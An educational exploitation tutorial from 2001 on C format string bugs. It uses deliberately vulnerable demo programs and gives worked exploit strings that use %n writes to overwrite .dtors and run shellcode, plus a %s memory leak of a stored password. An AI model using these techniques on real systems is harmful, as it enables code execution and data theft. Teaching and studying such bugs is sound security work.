.oO NOP Ninjas Oo. presents: [Format String Technique] www.nopninjas.com Author: sloth@nopninjas.com Date: 12-09-01 Version: v1.1 Revised 12/11/01 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=[Table Of Contents]=- 1.0 Prerequisites 2.0 Preface 3.0 Formats 3.1 More formatting 3.2 Stack Offsets 3.3 %n madness 4.0 Exploiting basic format strings 4.1 Finding the input arguments / Generating the debugging string 4.2 Placing the shellcode / What to overwrite? 4.3 Creating/Debugging the writing format string 4.4 Finding the shellcode 4.5 Creating the final string / Calculations 4.6 Executing the string 5.0 Shortening the format string 6.0 Format strings on the heap 6.1 Placing the addresses on the stack 6.2 Finding hard to reach data 6.3 Aligning the data 6.4 Finishing touches 7.0 Misc 7.1 About blind and remote (non-stock binary) attacks 7.2 Types of real world format strings 7.3 How to abuse %s 8.0 Information -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 1.0 Prerequisites Required: Knowledge of gdb, Linux memory allocation, and ELF executable format. C string formatting Little endian byte ordering Helpful but Optional Easyflow http://www.nopninjas.com/easy.tgz http://lamagra.sekure.de/ Scut from TESO: paper on format strings -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 2.0 Preface This document is not a definitive guide to exploiting format strings. Other useful information will come from experimenting. I hope this paper will explain how things are done in a somewhat easy to understand manner. I have tried to demonstrate as much as possible through examples (wherever possible). -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 3.0 Formats First format strings in c should be examined. There are only a few format characters from the entire that are relevant to this discussion. Any search engine should yield a more thorough list of websites with further information. %x - Print the hex value of the argument. %s - The char string at the address passed to it. %d - For our purposes this will just print strings of data for incrementing bytes. Should not be used, can create unwanted output. %u - For our purposes this will just print strings of data for incrementing bytes. This is unsigned as compared to %d which is signed. This will drop any negative values that could possibly add a - into the output. %n - Write the number of bytes previously written to the address given. Functions that use formatting are vulnerable when the programmer does not properly format the data before passing it. incorrect: printf(string); correct: printf("%s", string); This simple mistake could lead to a big security risk. All of the printf family of functions have this type of problem: (printf, fprintf, sprintf, snprintf, vsprintf, vsnprintf, etc). There are also other functions which may use formats (like syslog). 3.1 More formatting Since there are not any arguments given by the programmer, it will take the first argument off the stack. With the "$" format modifier any of the passed arguments can be referenced. For example: printf("%2$x %1$x\n", 0x1, 0x2); would output: "2 1" 3.2 Stack offsets It is assumed that the reader has some knowledge of how the stack works but it is not required. The most important thing that must be learned is the layout of where input data lies in relation to the current stack position. The crude diagram shows the layout as so: Bottom Top [ user stack ][ command line args ][ environment ] As noted, this is a crude diagram to illustrate the general layout. The current position will be somewhere in the user stack. It is possible to pop arguments off the stack to be displayed in hex with %x. With multiple %x formats it is possible to reach the top of the stack. Using the "$" modifier any argument can be directly accessed by its stack offset. Instead of a long strings of %x's there could be one "%95$x". Being able to access user input via stack offsets it crucial to the exploitation of format strings. 3.3 %n madness The %n format is used to write the amount of bytes already written into the specified (int) argument. When there is no argument given, it writes to the next argument on the stack. %n can be formatted with the "$" modifier to select any argument offset. %hn does the same thing but with the type (short). Here is an example of how it can be used: int main(int argc, char *argv[]) { int num; printf("%s%n\n", argv[1], &num); printf("Bytes written: %p\n", num); } sloth@sin:~/source/nopninjas$ ./test 1234567890 1234567890 Bytes written: Notice that 0xa = 10. To write 0xbfff, write 49151 characters into argv[1]. To test this out: sloth@sin$ ./test `perl -e 'print "A"x49151'` ... lots of A's ... Bytes written: 0xbfff This method can be abused and given an arbitrary address. This is what makes format strings lethal. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 4.0 Exploiting basic format strings It is not always simple to place the input data somewhere on the stack where it is easily reached. The following is a very simple demonstration: fmt1.c ---------------------------------------------------- int main(int argc, char *argv[]) { char buf[1024]; strncpy(buf, argv[1], sizeof(buf)); printf(argv[1]); printf("\n"); } ------------------------------------------------------------ sloth@sin$ ./fmt 'AAAA %x' AAAA 41414141 4.1 Finding the input arguments / Generating the debugging string The input is the next argument on the stack. Next expand the string into a more realistic form so that that the offsets on the stack will match up after changing the command line arguments. Use easyflow during the testing phase of writing format string exploits. Either the UNIX printf command in the shell or Perl will suffice. Keep in mind the little endian byte ordering of the addresses. easyfl: \l01020304 is the same as printf/perl: \x04\x03\x02\x01. sloth@sin$ ./fmt `easyfl '\l41414141\l42424242 \ \l43434343\l44444444%.010u%1$x%.010u%2$x%.010u%3$x%.010u%4$x'` AAAABBBBCCCCDDDD109479558541414141111163859442424242 \ 11284816034343434314532461244444444 sloth@sin$ Here is the output with the values bracketed: AAAABBBBCCCCDDDD1094795585(41414141)1111638594(42424242) \ 1128481603(43434343)145324612(44444444) Each of the 4 byte address strings will eventually point to locations in memory where writing is needed. Any 4 byte strings that are easily recognizable in a mess of data will do. If the %x offsets are correct, each of the address strings should be printed as hex in the order given. It is possible to put the brackets around the %x to make the output easier to read. In more complicated examples it may lead to changing the stack, throwing off the stack argument offset values. The %.010u will print out 10 bytes of data. Later these will be modified to change the values that %n will write. Those 10 bytes will be written as 0x0a into memory given that these are the first bytes written. Each following write will be an accumulation of bytes already written. For now, They are there to keep the string as static in length as possible during testing to reduce the chances of the offsets shifting. Since the first address is at the first argument offset on the stack we could just use %x. To conform with the rest of the string we can convert it to: %1$x. Each following address is selected by increasing the offset: %1$x %2$x %3$x %4$x. 4.2 Placing the shellcode / What to overwrite? For simplicity put the executable code into our environment: sloth@sin$ EXECSHELL=`easyfl '[200,\x90] \ '` sloth@sin$ export EXECSHELL Also for simplicity, overwrite .dtors. Further information on overwriting .dtors can be found at: http://community.core-sdi.com/~juliano/dtors.txt To find the beginning of the .dtors section use "nm " or some other similar utility to view the symbols table. In gdb the .dtors address can be obtained with "maintenance info sections". sloth@sin$ nm fmt ... skipping ... 080494a8 ? __DTOR_END__ 080494a4 ? __DTOR_LIST__ ... skipping Here is the stripped output from nm. The address that needs to be written is 4 bytes past the start of the .dtors section: 0x080494a4 + 4 = 0x080494a8. 4.3 Creating/Debugging the writing format string Now that there is an address to write to, it will need to be put into the format string. Each of following addresses will need to be incremented by 1 to point to the next location in memory to write to. 0x080494a8 0x080494a9 0x080494aa 0x080494ab sloth@sin$ ./fmt `easyfl '\l080494a8 \ \l080494a9\l080494aa\l080494ab%.010u%1$n%.010u%2$n%.010u%3$n \ %.010u%4$n'` ... output not useful ... Segmentation fault (core dumped) sloth@sin$ sloth@sin$ gdb fmt core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. ... skipping ... (gdb) bt #0 0x382e241a in ?? () #1 0x8048479 in _fini () #2 0x4003d80d in exit () from /lib/libc.so.6 #3 0x4003557d in __libc_start_main () from /lib/libc.so.6 (gdb) This shows that it crashed during the destructor phase (_fini). The current EIP seems quite random at the moment because each byte has not been adjusted yet. 4.4 Finding the shellcode The address to the executable code in this environment will need to be found. gdb is the way to go. This topic is covered in the suggested reading material. sloth@sin$ gdb fmt core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. ... blah blah ... #0 0x382e241a in ?? () (gdb) x/2000x $ebp 0xbffff854: 0xbffff860 0x08048479 0x401019b4 0xbffff874 0xbffff864: 0x4003d80d 0x401019b4 0x4000aa70 0xbffff8c4 0xbffff874: 0xbffff898 0x4003557d 0x00000001 0x00000002 ... pages of data in hex ... 0xbffffec4: 0x2f65646b 0x3a6e6962 0x7273752f 0x6168732f 0xbffffed4: 0x742f6572 0x666d7865 0x6e69622f 0x45584500 0xbffffee4: 0x45485343 0x903d4c4c 0x90909090 0x90909090 0xbffffef4: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffff04: 0x90909090 0x90909090 0x90909090 0x90909090 ... BINGO! ... Starting from the EBP ($ebp in gdb) search for the hex representation of the NOP's in the shellcode with "x/x". Above, 0x90909090 is at 0xbfffff04. 4.5 Creating the final string / Calculation Always remember to write in order of least significant bit to most significant. In this case the %u before the first %n will be the one to increment. There are 2 ways to do this -- calculate how many more bytes are needed or guess and adjust as needed. In small examples like this one, the guess and check method will work; however, sometimes due to the lack of output it may be necessary to calculate it exactly. 0x382e241a can be broken down into each byte as it would be written. First, 0x1a (26 in decimal) shows that 26 bytes have been written before the %n. 16 bytes are the addresses 0x080494a8 0x080494a9 0x080494aa 0x080494ab plus 10 more from "%.010u". The next byte 0x24 (36 in decimal) is a combination of the 26 previous bytes already written and another 10 from the second "%.010u". 0x2e (46 in decimal) is another 10 bytes more than the last. The same is with 0x38. It probably is not necessary to have to modify the least significant bit if the shellcode is longer than 256 bytes. Our new goal address to write is 0xbfffff1a. 0xbfffff1a = [191][255][255][ 26] 255 - 26(4*4+10 bytes for argument addresses + %.010u) = 229 255 - 255 = 0 <-- This means nothing has to be written for the 3rd (amount needed) - (already written) = (amount left to write) Subtract the amount of bytes already written from the amount of bytes needed. This will be the amount to put into the value for %u. Also, to jump ahead slightly, the next number is 255. This means that the same value can be reused in more accurate terms. Since it will have already written 255 bytes, the third %u can be removed. Here is the current string so far: sloth@sin$ ./fmt `easyfl'\l080494a8\l080494a\l080494aa \ \l080494ab%.010u%1$n%.229u%2$n%3$n%.010u%4$n'` Coming Soon. Summary: [%.010u %1$n %.229u %2$n %3$n][%.010u %4$n] If it is not possible to subtract bytes written without a negative answer, the last write will have to roll over into the next significant byte. 255 = 0xff 255 + 256 = 0x1ff <-- roll over 191 = 0xbf 191 + 256 = 0x1bf(447) 447 - 255 = 192 192 bytes will have to be written with %u to get the last value in place. The final string should look like: sloth@sin$ ./fmt `easyfl '\l080494a8\l080494a9\l080494aa \ \l080494ab%.010u%1$n%.229u%2$n%3$n%.192u%4$n'` Summary: [%.010u %1$n %.229u %2$n %3$n %.192u %4$n] 4.6 Executing the string It's time to execute it and check the results. In the example the "hello world" shellcode was used. It will just print the string and exit. An extra "; echo" at the end will add a new line after the "hello world" because the default shellcode in easyfl does not contain a "\n". sloth@sin$ ./fmt `easyfl '\l080494a8\l080494a9\l080494aa \ \l080494ab%.010u%1$n%.229u%2$n%3$n%.192u%4$n'`; echo 013451792800000000000000000000000000000000000000000000000000000000 \ 000000000000000000000000000000000000000000000000000000000000000000 \ 000000000000000000000000000000000000000000000000000000000000000000 \ 000000000000000000000000000000001345179290000000000000000000000000 \ 000000000000000000000000000000000000000000000000000000000000000000 \ 000000000000000000000000000000000000000000000000000000000000000000 \ 00000000000000000000000000134517930 hello world sloth@sin$ The odd numbers inside the string of 0's are the arguments popped from the stack by %u. If the "$" modifier is not used with %x or %n it would require having buffer arguments to pass to %u. [%u arg][%n arg][%u arg][%n arg][%u arg][%n arg][%u arg][%n arg] real: [AAAA][\l080494a8][AAAA][\l080494a9] etc... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 5.0 Shortening the format string It is not necessary to use 4 write statements. It is possible to only use 2 writes, each of 2 bytes to write the data. This way other data is not accidently overwritten if it is necessary to roll a value into the next significant byte. It is also used to make the string even smaller. For safety %hn is employed here even though just %n could be used. Using the last example we can build our sample string. The 2 locations that need to be written to (.dtors) 0x080494a8 0x080494a8+2 <-- The second argument address is incremented by 2. 0xbfffff1a is still our shellcode address. We can break this up: 0xbfff = 49151 0xff1a = 65306 65306 - 8(bytes for addresses) = 65298(bytes left for %u to write) 49151 + 65536 = 0x1bfff 0x1bfff(total) - 0xff1a(already written) = 49381(needed) No more goofing around. Lets test it out: sloth@sin$ ./fmt `easyfl '\l080494a8\l080494aa%.65298u%1$hn \ %.49381u%2$hn'`; echo ... LOTS AND LOTS OF STUFF ... hello world sloth@sin$ Yet another format string is broken. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 6.0 Format strings on the heap For the next example the format string will be placed on the heap. Because this is a local hole, exploiting it should be fairly trivial. fmt2.c ---------------------------------------------------------- #include #include int main(int argc, char *argv[]) { char *blah=malloc(1024); fgets(blah, 1023, stdin); printf(blah); } ------------------------------------------------------------------ 6.1 Placing the addresses on the stack Sometimes the input buffer to the format string is not on the stack. On a local system this is a simple task. The addresses can be placed as an argument string to the program or can be placed in the environment. Be careful for special characters that may not be passed such as \x00 on the command line. sloth@sin$ export ADDYS="AAAAAAAA" or sloth@sin$ ./fmt2 'AAAAAAAA' (must be done with each execution) 6.2 Finding hard to reach data To find the general offset a simple bash loop can be used: sloth@sin$ for (( I=1; I<500; I=`expr $I + 1` )); do \ ( echo "$I %$I\$x" ) | ./fmt2 |grep 4141; done 364 4141413d 365 41414141 6.3 Aligning the data As you can see, the alignment is off because of the the rest of the data in the environment. sloth@sin$ export ADDYS="AAAABBBB" sloth@sin$ (echo '%.00010u%364$x%.00010u%365$x') | ./fmt2 Bracketed: 0134518248(4141413d)1073743880(42424241) Adding an alignment character to the string will fix the leaking characters. sloth@sin$ export ADDYS="AAAABBBBX" sloth@sin$ (echo '%.00010u%364$x%.00010u%365$x') | ./fmt2 Bracketed: 0134518248(41414141)1073743880(42424242) Everything is aligned now. It is time to put the addresses for .dtors into the environment. 6.4 Finishing touches sloth@sin$ export ADDYS=`easyfl '\l080494f4\l080494f6X'` This format string does not have any addresses or data printed before it. %u will have to write the exact amount for the first write. 0xff1a = 65306 0x1bfff - 0xff1a = 49381 sloth@sin$ (echo '%.65306u%364$hn%.49381u%365$hn') | ./fmt2; echo ... LOTS OF GARBAGE ... hello world sloth@sin$ Again the hello world shellcode is executed. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 7.0 Misc Stuff 7.1 About blind and remote(non-stock binary) attacks When it comes down to blind or remote format strings it is necessary to be very precise. Exact calculations as well as stack dumps with %x can be very helpful. .dtors is really only useful when there is access to the binary. This is all stuff that should be learned through experimentation. 7.2 Types of real world format strings fprintf, printf, sprintf, snprintf, vfprintf, vprintf, vsprintf, vsnprintf, setproctitle, syslog, and more. These are all commonly missused in the real world. Here is an example of a misused vsnprintf (a personal favorite). fmt4.c ------------------------------------------------ #include #include void printing(char *fmt, ...) { va_list ap; char output[1024]; va_start(ap, fmt); vsnprintf(output, sizeof(output), fmt, ap); printf("ARG: %s\n", output); va_end(ap); } int main(int argc, char *argv[]) { if(argc>1) printing(argv[1]); <-- printing() must be formatted /* correct usage */ /* if(argc>1) printing("%s", argv[1]); */ } ---------------------------------------------------------- 7.3 How to abuse %s With %s, any string in valid memory can be output. It could be a password, user data, environment variables, or anything else that could be useful. Here is a sample of how to abuse %s: password.c ----------------------------------------------- static char password[] = "hax0r"; int main(int argc, char *argv[]) { char buf[256]; strncpy(buf, argv[1], sizeof(buf)); printf(buf); } ---------------------------------------------------------- With the output of nm the address of password can be found. sloth@sin$ nm test ... skipping ... 08049484 d password ... skipping ... 0x08049484 is the address of password. sloth@sin$ ./test `easyfl '\l08049484%s'`; echo hax0r sloth@sin$ This is just a very basic example. Using %x to dump data off the heap, it could be possible to use that data with %s to find out more information about what exactly is happening. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 8.0 Information www.nopninjas.com - My stupid site. Links to resources, news, and wargames. www.pulltheplug.com - Wargames collection (irc.pulltheplug.com vuln dev). Thanks to dies and all the maintainers of the various servers. Also all those who help others. http://bassd.labs.pulltheplug.com http://mainsource.labs.pulltheplug.com hack.datafort.net - More wargames community.core-sdi.com - good stuff www.rootsecurity.net - Cool people [RsN] Also runs bassd.labs.pulltheplug.com. 12/09/01 - www.nopninjas.com - sloth@nopninjas.com